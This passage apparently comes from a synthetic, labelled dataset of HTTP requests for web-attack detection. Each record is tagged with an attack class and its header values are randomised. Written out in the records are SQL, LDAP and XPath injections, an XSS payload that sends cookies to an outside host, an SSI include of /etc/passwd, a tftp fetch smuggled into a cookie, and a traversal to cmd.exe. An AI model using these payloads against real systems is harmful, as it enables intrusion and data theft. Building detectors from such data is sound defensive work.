Accept-Encoding: identity;q=0.5, compress;q=0.1, gzip, compress;q=0.4
Accept-Language: NoaTtlve-iedu7Ee, ludlus-P2s3
Cache-Control: no-transform
Client-ip: 110.83.94.179
Cookie: lseeyuiiwtptim=iri:sMns;HdGW1Sd=8072;w6dorennRn=sSvnifihlltii;eitYateccnWe=Ntvtcqelvns4i
Cookie2: $Version="499"
Date: Sun, 21 Nov 04 16:13:53 UTC
ETag: W/"tZoFNZYSXd7bs4u"
Expect: cero3t
From: heIinnsa@oahcE7tm6m.cz
If-Modified-Since: Wed, 20 Sep 06 13:29:03 GMT
If-Unmodified-Since: Fri, 17 Jul 09 05:01:14 GMT
If-Match: "XH5-bSPYDo.7hPTVRj"
If-None-Match: "NJtkfLmi6WnH-YQI"
If-Range: "olFOgZTknQx9bie"
Max-Forwards: 2225
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="sSsd"
Authorization: Basic aHByYjozc2VjSTZiSA==
Range: 334983-612045,3433-74,55-
Referer: http://vcym5neh.st/mIese/rIues9ow/Ermsoxh2/oeuh/Nhaln8.bin
TE: gzip;q=0.5,trailers
Trailer: Via
User-Agent: Soa0isa/9.2.4.4
UA-CPU: 68000
UA-Disp: 1599,031,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 072x4241
Via: HTTP/7.1 www.khiwjou.tiff, 7.8 www.4nSeet.js:2, HTTP/3.8 14.37.255.45
Transfer-Encoding: deflate
Upgrade: 1to/8.7, hEen5n/0.3
Warning: 313 www.NteEt.png "Pcgrneh6n" "Fri, 24 Jul 09 11:00:14 GMT"
X-Forwarded-For: 220.205.21.58
X-Serial-Number: 74857144808284221
----: ----------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38844
Start - Id: 42271
class: SqlInjection
GET /do/aHYas3dsuo3g/tal.dll?OjkfinPFa=5648&hcnolib=%3Eeem7w6h8%5D%3Dl1%2F%26a&enhwqn4teh=dn8mailstdin&anoTa=%27++group++by++++users.id+having+++++0118%3D0118&sxmdmtdosw=0952&hysamC=j6Pk3e-iT3q2&aattl=e45sm&or=1rftps5drm+iticsye&plela3optloidse=8F4XU HTTP/1.0
Host: www.oiics.org
Connection: dmaMsA
Accept: */*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: compress
Accept-Language: rtsfn-nt1eee;q=0.0, hhpac-ldg4o0, t-DQ;q=0.5, 9enec-Si41;q=0.3, hoEbhgaa-r;q=0.1
Cache-Control: only-if-cached
Client-ip: 241.101.146.87
Cookie: WWo8dB=679719;7w4p7i4eu1=hic;oisie0otgisg=dis9tofeIheho;til
Cookie2: $Version="520"
Date: Wed, 11 May 05 22:03:20 GMT
ETag: "cQI1KzijYNcy.dQfk"
Expect: sRremose
From: eethwr@T5iivnsieh.be
If-Modified-Since: Fri, 05 Mar 10 18:21:07 CET
If-Unmodified-Since: Wed, 09 Jan 08 20:55:22 GMT
If-Match: *
If-None-Match: "il1.@MkBFhkiWavrJE"
If-Range: Sat, 20 Feb 10 10:26:49 UTC
Max-Forwards: 42
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWVlT2luN25CbmdyZmFla3JsbDF0YXkzZ3Rpa2xmbW4=
Authorization: Basic bGRoTGVncjpvamlu
Range: -949568,-7
Referer: http://www.8ge8uet.cz/fleyty/rsaxoj.pdf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/2.0 (X11; U; Linux i386 4.3; hu-Wo; rv:7.0.3) Gecko/09079705
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0775x379
Via: 5.7 www.leXagn.shtml, 5.1 www.rQ1pt.html
Transfer-Encoding: deflate
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 301 34.243.209.148:30161 "olzejaFnho9ieieodT" "Fri, 02 Jan 09 11:48:48 CET"
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 280200406213
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42271
Start - Id: 36886
class: LdapInjection
GET /err02q-tWTZ74/eIpBJW9t/yww90kE6RI9CNzL0quhs/avte9asnaoooij/wontsWlQyENva/EtaebT11uidtsocbEc/ti8K1WE6FEI/em_Fa7/t2oht1MbZ5i_x@dnkJO/l5/tc.nsf? HTTP/1.0
Host: 5.161.208.173:299
Connection: tNla45
Accept: image/*;q=0.3, audio/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: he-euaio, aaU0-e5laA;q=0.7
Cache-Control: only-if-cached
Client-ip: 211.178.12.185
Cookie: heeamzenrpteomn=wtn;casps'uwrgnoenstw;nanDimt=snnhI7;nmb=112;mens=) (  |(6ie=da*)
Cookie2: $Version="571"
Date: Tue, 23 Nov 04 17:11:42 CET
ETag: "2fYKv5.NAag17_oRu_"
Expect: soenccn
From: u7wnzhs@qthmoVaaw.st
If-Modified-Since: Sat, 18 Apr 09 19:28:16 UTC
If-Unmodified-Since: Thu, 01 Jul 04 02:58:57 GMT
If-Match: "YSXZkKinLdz3nS-aCg"
If-None-Match: *
If-Range: *
Max-Forwards: 1237
MIME-Version: 9.8
Pragma: itheared='e'
Proxy-Authorization: Basic QWVJcmFoOjhsZDd0OQ==
Authorization: ohyd 1cjloct=ceaae5gy
Range: -97784,740-4,992-05622
Referer: /fNae3T.sh
TE: chunked,trailers
User-Agent: eiindlml/6.5.0.1
UA-CPU: MIPS
UA-Disp: 5898,6177,16
UA-OS: Windows NT
UA-Pixels: 755x6863
Via: HTTP/5.0 www.ominbi.gif:232, 6.9 www.iw5wu.png, HTTP/2.7 249.224.205.123:682
Transfer-Encoding: identity
Warning: 131 www.eea2mn.jpeg "ygsearuoIlRigensha" "Sat, 23 Dec 06 15:37:17 UTC"
X-Serial-Number: 441224471064732
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36886
Start - Id: 47621
class: XSS
GET /ef95i8MBObCKi/tzbFiDKXuh8jc/Eictbt71opauu/iaoasrcceeieh7cee/ot/oCDDz2pjVy9vClQ-/27XUCJ-v/fgzKRdfi7MN/e0@-xCS78txZ9s1z/idCLkZHGa8aA9h.pl?aqaq6oeFnieeapa=sPsy&tuab=%3Cinput+++type+++%3D++++%22image+++%22+dynsrc+++%3D+++%22++javascript%3A+%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.onre.com%2Fcgi-bin%2Forning.cgi%27%2Bdocument.cookie%29%3B%5D++++%22+++%3E&Zol3lyEuTn=-s&s4sae0pchnh=sen&sT=httpi2eaib6+8co&aedNoce=ia6CwEio HTTP/1.0
Host: www.Eeoihew1.fr
Connection: wtr3
Accept: */*;q=0.9
Accept-Charset: euc-kr;q=0.3, cp-932, iso-2022-jp, x-mac-hebrew, x-mac-arabic
Accept-Encoding: *;q=0.2
Accept-Language: ocsifitd-d3vth;q=0.0, ihptIn-5aehoqan;q=0.3, sx-kt, iomts80-sse;q=0.5, aseth-26Iiss;q=0.7
Cache-Control: no-transform
Client-ip: 158.187.180.34
Cookie: nhem96d= 6;tmSaa7hsorrac=6131197;e2hdotj1LdSet=o2JS3kK;asngs4sI=d4kperl0;l2=od
Cookie2: $Version="5"
Date: Thu, 16 Jul 09 18:56:32 UTC
ETag: W/"yBEcpab3o9aU.FzIZZ"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Sun, 24 May 09 12:57:00 GMT
If-Unmodified-Since: Wed, 04 May 05 10:55:11 CET
If-Match: "0RSXYfsh1Zj@J5Hh_"
If-None-Match: *
If-Range: Sun, 10 Jul 05 19:57:30 UTC
Max-Forwards: 52
MIME-Version: 5.8
Pragma: Hm=el8enIFm
Proxy-Authorization: Basic b29iYWU6c3NpdnI=
Authorization: Basic ZHN0d25pZDp0b2hy
Range: 393273-
Referer: /reifevhA.tiff
TE: deflate;q=0.3,gzip;q=0.3,chunked;q=0.6
Trailer: Expect
User-Agent: Mozilla/5.2 (X11; U; SunOS sun4u 1.0; 6e-Hr; rv:2.4.0) Gecko/02597606
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: dvo/8.7 www.nhabn.jpg, HTTP/8.2 98.68.186.11, FTP/5.0 www.oS7tcr8a.js
Transfer-Encoding: deflate
Upgrade: piajie/8.1, 2et/2.5, 7inhes/4.8, cdhiar/4.9, 3uyvrn/7.3
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 119.112.244.238
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47621
Start - Id: 49268
class: XPathInjection
GET /kBfX2/o54@/dNwguTpLz@Gy.tiff?Rdcsre7=737&oecAocslfqpe7k6=612986&eecqenrDyeds=nH&hglodnrmh8q=lta&EykhTafwlbr=ukUerl2ZGPE&sO5at=heRHN2VGN.h&prKttlr=tY4pPm6g&Ui.lR.=8441597&loln6oseaale5e=0c0ir4ldtc&2RQI=so0iioc6ysobl6&rtsha=549&taosshS=ygo%27++++or+++++nIiu%2Fi%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D18%5D+++or++%27efi%27++%3D%27&uHutTtose6eh=elsr9rto%24y&sannoncseth=me0ial%3Etsh5&5T9hhhoarn=+ HTTP/1.0
Host: www.tspadp.uk
Connection: close
Accept: */*
Accept-Charset: x-mac-ce
Accept-Encoding: *
Accept-Language: r-weuru, yeg-2hoema8i;q=0.5, 1iy-oto
Cache-Control: no-store
Client-ip: 88.174.167.80
Cookie: e4idettwren=7331;mtaenttoehOzcnO=hle/rfx
Cookie2: $Version="395"
Date: Tue, 02 Aug 05 18:59:40 CET
ETag: W/"U5U_78@j-0G5kJ9g"
Expect: GerE30=m8mee1ye
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Thu, 08 Dec 05 14:42:54 CET
If-Match: "sAI3NqPzns51YpFzzRT"
If-None-Match: *
If-Range: "8bMzJAtr9LETKr2"
Max-Forwards: 949
MIME-Version: 1.6
Pragma: oa=t
Proxy-Authorization: NTLM ZWVhc2thdGdlMmpwc3J5YmxsaGU3YUV3c2VzdGhhMmV0b2Q=
Authorization: NTLM M2Jid2VpZzZzZHRtMWxTZWhpcGM3aWRwZXRCbG9mcm1lZWduZHJoamV5b3Q4dGM=
Range: 560-83908
Referer: /eeensE/0hi0te/irleg/drdrr/zfsVye.shtml
TE: trailers,deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: Sucbui/5.7.0.6.6
UA-CPU: x86
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 2.2 197.241.147.220
Transfer-Encoding: jsiflo
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49268
Start - Id: 39831
class: SSI
GET /hx/ar4s/swqmailx/wxkxyDVl-514b@TbnGN/m6AmFz5t2dTxH6/7le4fOh7OvWeEr.php3?egrlmahtLiayc=%3C%21--+%23include+++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E HTTP/1.0
Host: 156.247.148.192
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936, iso-8859-15;q=0.3, windows-874, shift_jis;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: ueaen='oualerj'
Client-ip: 62.170.182.80
Cookie: eonoiy=hlrNhpieat;o8trnfnphJ=>~[wyr 0n;2ata=?l)y3;D_1v9KwfpositionnBU=oomtulwcIupdate scuage6e;cEo9nsUce=6
Cookie2: $Version="00"
Date: Sun, 08 Nov 09 08:14:19 UTC
ETag: "63kQDQpII_6GCiFlfNX"
Expect: 100-continue
If-Modified-Since: Mon, 14 Jun 04 18:02:21 GMT
If-Unmodified-Since: Thu, 06 Apr 06 08:11:28 UTC
If-None-Match: "JzlGIhn0gT3lm0Y@l"
Max-Forwards: 1
MIME-Version: 8.3
Pragma: no-cache
Authorization: Basic aWg4YTpkaThuNw==
Referer: /twsnv.php3
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 7.1; ih-ud; rv:3.5.0) Gecko/40037248
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3110x4951
Via: 4.1 www.aropr.css
Transfer-Encoding: nsOoSn; iurc5t=prrpae2l
X-Forwarded-For: 158.183.166.134
X-Serial-Number: 46103258544750968619
----: ----------------

null

End - Id: 39831
Start - Id: 44632
class: OsCommanding
POST /hN6iFer/fN9Wuupdatevarc/wy2pEIdn2Rn/lectajsio1smttsrr/89H9NtozaeT7/bPtil6KR/LneWaqae2t/0_S0rammtMdgM/lhicsi.html? HTTP/1.0
Content-Length: 166
Content-Language: t
Content-Encoding: gzip
Content-Location: /1eegjsfe/nrlsni.cfm
Content-MD5: b2Fybzdyc2lCdWNoZG5vcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Nov 07 04:56:50 CET
Host: 46.161.164.144
Connection: keep-alive
Accept: image/jpeg;q=0.6
Accept-Charset: shift_jis;q=0.8, us-ascii, iso-8859-9, iso-8859-3;q=0.0, iso-8859-8
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Cookie: niin=qservicestadaDmSo;yUEZ77LlZt=511;ceo=hhm2apifuo;ss6teiareeuthd=45r.@s_W;iatldohg=197.134.219.22  |tftp 192.168.10.33 evil.txt;sRe=he2y-jDs
Cookie2: $Version="092"
Date: Tue, 17 Jul 07 02:38:44 CET
Expect: 100-continue
If-Modified-Since: Wed, 22 Jun 05 15:01:11 UTC
If-Unmodified-Since: Mon, 30 Nov 09 24:53:37 UTC
If-Match: *
If-Range: "XbJSGt_D.LYRrlFS"
Max-Forwards: 0
MIME-Version: 3.7
Proxy-Authorization: Basic UHllcDphaWlldHM=
Range: 3187-,26-4571
Referer: http://62uea.cz/ruber5.zip
User-Agent: Mozilla/8.2 (Machintosh; U; PPC 2.0; ug-fk; rv:9.5.9) Gecko/94557885
UA-Disp: 357,8132,16
UA-Pixels: 5150x546
Via: 8.0 www.Ehso.shtml, 4.3 83.108.193.107, ta8/9.2 www.zAhsvety.tiff
Transfer-Encoding: identity
Upgrade: wntf/9.9

wi5eer=lid'~$etcntstdin>nscripta&bitz=oet&b36eimgp=r/&Eprocessing-instructionN3BncQzsdxA= |tform'childeiqxi a&orMBrkxPxmlQ=t9k8eIvEaF8W&elaaodioi=071643

End - Id: 44632
Start - Id: 43818
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 52.44.0.171
Connection: close
Accept: video/*
Accept-Charset: windows-1257;q=0.3, x-mac-arabic
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.3
Cache-Control: max-age=98
Client-ip: 124.28.157.145
Cookie: 1jnidhnhicohcla=au|;tcew6sp=518477;aee=rrwxld;Eq1D=tlQZs3SyzA
Cookie2: $Version="513"
Date: Sun, 21 Feb 10 13:17:53 CET
ETag: W/"-MJfZJF0gHAQgRUgxoJi"
Expect: 100-continue
From: cw3btxir@daeQnmosye.biz
If-Modified-Since: Thu, 08 Jul 04 11:04:37 UTC
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Digest opaque="aias"
Range: 7246-,-7950
Referer: http://www.aas2e.gov/aenB.jpg
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: r7fnOn/7.4.8.0
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6925x167
Via: 0.7 www.itme.htm
Transfer-Encoding: gzip
Upgrade: p3d/0.6, 4skh4H/9.8
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 055444693738
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43818
Start - Id: 37812
class: LdapInjection
GET /tbiswltlTtdcaqdm4.tiff?ynlnn=%29%28%7C%28displayName%3Dhad*%29++%28name++++%3D++++had*+%29%28++mail%3Dhad*++++%29 HTTP/1.0
Host: www.thoseimma.it:50
Connection: close
Accept: application/x-tar;q=0.6, video/*;q=0.6, text/html
Accept-Charset: shift_jis;q=0.2
Accept-Encoding: identity;q=0.9, identity, gzip, compress, gzip
Accept-Language: rhAinoo-2GfS;q=0.0, t-eext2, ses9etF7-1;q=0.4, eeMaal-asdpfyc;q=0.5
Cache-Control: ddc4ht=eo
Client-ip: 172.140.190.216
Cookie: oeiBmt=hdivib;spnrdb=1r;wjd6Z=0;si=ta
Cookie2: $Version="09"
Date: Tue, 27 Apr 04 16:47:42 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: ztaaa=cfRocveh;Wateb=n7Ct5Til
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Tue, 21 Dec 04 01:40:49 CET
If-Unmodified-Since: Sun, 28 Mar 04 23:52:32 GMT
If-Match: *
If-None-Match: "qdSIMPkMcHTsIBu"
If-Range: Sat, 22 Dec 07 24:10:43 GMT
Max-Forwards: 7697
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Digest nc=B05E67f3
Range: 3012-675
Referer: /nnea/whot2h.asmx
TE: gzip,gzip;q=0.6,gzip
Trailer: Connection
User-Agent: g5rmatysnawibEE
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 7.1 www.dsotcea.tiff, 2.0 5.236.158.57
Transfer-Encoding: identity
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37812
Start - Id: 35264
class: SqlInjection
GET /sailWodad/h7auienx/ytk44cQMVnp/replacexmlpassthruUL6MB/eG/nsRJU/efltsqmshteSkeM/nBxQ1/nnrhrtr0tbAycdtftrta.png?rya=awteee3Kttosoi&u0=780656+or+id%3E4+++++or++++ls_id%3C90368&d_4KrH=zb%24bronHdbetweenU5hs&netcat72Grvg=tmBuqLjY0YZ&nA=%5Bit%5Crt%3D%7C&e4no6j=191713&daldgoXlnal=67932&GoeaustwatheneS=mUm%40tuzbQ&xnxghqtsyrReEse=kL%40JTy HTTP/1.1
Host: www.aaite0e.gov
Connection: close
Accept: video/mpeg
Accept-Charset: x-mac-chinesetrad, iso-8859-9, x-mac-arabic, x-mac-icelandic;q=0.9, gb2312;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 109.198.163.157
Cookie: nvo=3arn;wtrmeueei=hks
Cookie2: $Version="06"
Date: Wed, 06 Aug 08 06:00:33 GMT
ETag: "bvEbhRuWJy1AnSCQb"
Expect: 100-continue
From: lpter@0feo.uk
If-Modified-Since: Mon, 10 Mar 08 20:04:24 GMT
If-Unmodified-Since: Sun, 05 Aug 07 13:08:51 UTC
If-Match: "49Y2aJQkLsrclT-vssYb"
If-None-Match: "1yrJVAEuoc6NI.AOn"
If-Range: Fri, 18 Jan 08 12:34:12 CET
Max-Forwards: 1120
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: 8eEcs dejCatel=tunerro
Authorization: Basic aXdmZWxhbTppZXR1
Range: 930-456,2355-
Referer: http://iheevo.de/FtohZs/aAanru6/4seOau/myot.tiff
TE: chunked
Trailer: Referer
User-Agent: nataun
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 827x876
Via: HTTP/4.0 www.E1jxety.gif, 1.4 192.73.193.117
Transfer-Encoding: compress
Upgrade: sJi/7.6, enhin/3.8, 4oba/9.2
Warning: 900 139.60.79.76 "ln9aeaneieNgnh6Hl" "Mon, 29 Jan 07 22:28:50 GMT"
X-Forwarded-For: 149.48.124.188
X-Serial-Number: 086505531477
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35264
Start - Id: 47694
class: XSS
GET /tpm/oswhyheu8u8doUe2/motl/It3YwWC0W/object0aor4Nx/rMPO/tt9Ga3/xS/l9rW7qSOd.exe?a6oMhyng=iv7onzt64hizO&Rer=%3Cdiv+++onmouseover+++%3D%22+%5Balert%28%27elB%27%29%3B%5D++%22+%3E&eo=rugdusteyyrrDs&srdsyelece=tFPw2&tnncuapseacou=skac&Pousrqx8=oht&cZn8SndV=wJepLzkdroH&rtivur=h++tb%5Cylynf&bhpcuuhwhifsn=4701119 HTTP/1.0
Host: 35.241.44.204
Connection: keep-alive
Accept: image/jpeg;q=0.4, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 29.159.169.244
Cookie: 1Ohboot.ini8Xk2=0438;Theun=Ebe hucrc-yoE;4sohio7aclo=q89pi;nigjttg8ehtig=inopen;ii4e=0399;yeNi= av
Cookie2: $Version="676"
Date: Sat, 01 Jul 06 13:00:18 UTC
ETag: W/"3RHIlr@KyXDlBypEK"
Expect: 4tnsbsi=twdiihsS;wiecasfs=deaot5
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 27 Nov 09 14:41:42 GMT
If-Unmodified-Since: Mon, 13 Nov 06 17:25:32 GMT
If-Match: *
If-None-Match: *
If-Range: "a-ZpQlzTiI8L.Fl3"
Max-Forwards: 4
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: Basic Mmhvb29pbzpjaXRlcHQ0dA==
Range: 57-,235-9884,973-85
Referer: /rgddtnze/tled/aui4w/nwutiir.gif
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: nesayon (hzQp9Unec; ekvwqQg4fr)
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 934x7117
Via: 9.4 www.ao3itLj.html, FTP/2.7 104.74.153.1:652
Transfer-Encoding: gzip
Upgrade: 4Siht/2.2
Warning: 422 www.tsahzte.tiff "ndnheiEmueo" "Fri, 27 Jan 06 13:37:13 GMT"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47694
Start - Id: 45512
class: PathTransversal
GET /gKt95ciD/iadtctl6antore/oyqpI/pM-ZD/t9aweeshOrvoqgds/izapzhKiYDaDCu/l5/vsLthjaenrir.jsp?CotzpMHeeiuo=ia&cosmuNOdb=ut2cdDst&dinBaam=rnot2jzsdksyat&r0tohy=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat HTTP/1.1
Host: 202.123.10.181:80
Connection: close
Accept: image/gif;q=0.1, text/plain;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.9, gzip;q=0.7, identity;q=0.5, compress
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 34.130.199.77
Cookie: aueloRroa0eiGg=5458;naamgso2e=0281172;heoosPly=5966;ootoToe=oyba2mocha5nnAu;mnoxto9ahw6=gntdaott
Cookie2: $Version="77"
Date: Sat, 12 Jan 08 08:41:42 GMT
ETag: "HCkSEP_Kj70TdQ5Q5"
Expect: 100-continue
From: deeIete@oniiixeM.de
If-Modified-Since: Sun, 15 May 05 10:06:11 GMT
If-Unmodified-Since: Fri, 28 May 04 23:06:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1120
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: Digest qop=auth
Range: 55569-482846
Referer: http://www.7tfrHaeu.fr/2ishrAs.pl
TE: deflate
Trailer: Accept
User-Agent: o2teokm2amerjt68o1mb
UA-CPU: x86
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2096x915
Via: 4.5 www.irtI.tiff, HTTP/3.5 www.aaeh.tiff, aasipd/2.5 91.117.89.130:501
Transfer-Encoding: identity
Upgrade: paa/8.6, yprO/1.1
Warning: 336 www.pkli.gif "eE8hyyveresaci5o6et" 
X-Forwarded-For: 59.230.132.58
X-Serial-Number: 8223453
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45512
Start - Id: 35024
class: SqlInjection
GET /eWdRCs5u5hBdp/agoEmesohhN5LShss/n1iY/9PxskrxFs/cb8yyW/Rstmy2teeInlyereB6/ipWb1ft/43PVr9d8Fro3-UxJse-y/phpsckT/dxXckpBk.shtml?sfotdtoc=9ey%7Cr%3Emj%7E+mlhpositionilt%223&aanli=21920&guyen=57 HTTP/1.0
Host: 167.39.57.167
Connection: close
Accept: application/*;q=0.0
Accept-Charset: hz-gb-2312, utf-8, shift_jis;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=658
Date: Thu, 10 Nov 05 12:50:58 UTC
If-Modified-Since: Sat, 02 Apr 05 13:57:55 UTC
If-Unmodified-Since: Tue, 02 Mar 10 22:16:04 UTC
If-Range: Sun, 14 Jan 07 06:34:38 GMT
MIME-Version: 8.6
Referer: /PeesooTi/emhw/i6tl8/htqan4si.php
Trailer: Via
User-Agent: ';    EXEC    master..sp_makewebtask  "\\190.219.112.6\stl\eT.png",    "SELECT *    FROM   INFORMATION_SCHEMA.TABLES"
Transfer-Encoding: compress

null

End - Id: 35024
Start - Id: 35293
class: SqlInjection
GET /ratpodotScebenXoT/sQs4mY.evXodHUwf6bVN/dgTJLYrYx.PVlqs5/mnn4/acIDuthS4aor/mkYQeE4PqJl14JOnjj/aet9d@NScqynQehwqYCS/isb0sI58eael/nX5K8wah6v1tAL.Bj/33egw/lithLanm2xinxsah.html?ynnjrlfEuba=oV2LIj9&Ygt8llboteae=48096944&Wbie5i2=%40ua3e&M6r6=%27+AND+USER_NAME%28%29%3D%27ga&dybsd=1560204&kpyammmr=shv0loo&ow=31 HTTP/1.0
Host: www.u9pmg.st
Connection: mscdixww
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.2, gzip, identity;q=0.8, deflate, compress
Accept-Language: aNaa4sif-Cadt5yT
Cache-Control: max-age=972
Client-ip: 213.3.132.26
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Tue, 07 Jul 09 12:28:04 GMT
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Mon, 29 May 06 19:30:53 UTC
If-Unmodified-Since: Fri, 24 Nov 06 01:20:17 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 01 Aug 09 09:43:39 GMT
Max-Forwards: 64
MIME-Version: 8.3
Pragma: 3vQonb='EheOeehs'
Proxy-Authorization: Digest opaque="wwob"
Authorization: Digest response="63e449EaDA96C351aed58DC48f8d64E0"
Range: 930-456,2355-
Referer: /iesG4ain/hhvex/hijjat/delpeaea.jpeg
TE: chunked;q=0.2
Trailer: Warning
User-Agent: i1yK9FW http://www.sd6ebd.org
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9202x764
Via: 3.3 www.eir4am.htm, 7.1 www.jkne.png:3, 8.1 135.227.95.210
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35293
Start - Id: 36328
class: PathTransversal
GET /9FszmdvCZsGR/m7qTKyKGqXikquz8W8/2i7asRdHA34zafBEd/sL1B/eRVU_WwfeLqV-4nRZrHV/xmessano5i1mug9ie/OueDzbsbte.php4?ttLhdnrasiotiNd=o%3A%2F.htaccess%7E&ihh7Ta7he6ne=srmetjsflbres3&aeu=dRtaOZusS&rpscee=htpasseodaS&tC3ql3smnna=sL3zeywkdFD&ymnyyataAhrja=dusa&ios4q1nyirisedw=ml05yr2&sdRiewrot=3199418072&Rtmpj_0=x4FJ8D&Aldbhelp3fyslu=eeifncdemtpat&annoeheggccKaei=%5CfoUj&9sd3=913560262&zwGAtRz=m69e&1.rX6S2=108&EXwindow.openGb=85527561 HTTP/1.1
Host: www.hAf4accvt.com
Connection: keep-alive
Accept: text/plain, image/*;q=0.5, image/*
Accept-Charset: iso-8859-6;q=0.8, x-mac-roman;q=0.0, x-mac-icelandic
Accept-Encoding: deflate;q=0.9, deflate, gzip
